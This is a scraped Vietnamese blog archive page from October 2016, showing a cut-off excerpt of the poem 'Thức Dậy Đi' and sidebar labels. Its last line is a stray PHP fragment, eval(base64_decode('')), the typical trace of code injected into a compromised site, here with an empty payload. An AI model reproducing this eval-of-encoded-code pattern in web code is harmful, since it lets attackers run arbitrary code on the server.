Archive for October 5th, 2016

Thức Dậy Đi, thơ Trần Trung Đạo, nhạc và trình bày: Nguyễn Trọng Khôi

Thức Dậy Đi, thơ Trần Trung Đạo, nhạc và trình bày: Nguyễn Trọng Khôi

THỨC DẬY ĐI Mặt trời mới mọc bên kia biển Hay lửa phương đông báo hiệu mùa Thức dậy đi em giờ đã điểm Mẹ khóc lâu rồi em biết chưa? Thức dậy đi hỡi rừng núi cũ Nghe tiếng nghìn xưa vọng trở về Ai đứng trông ai m

10.5.2016 | Thơ |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>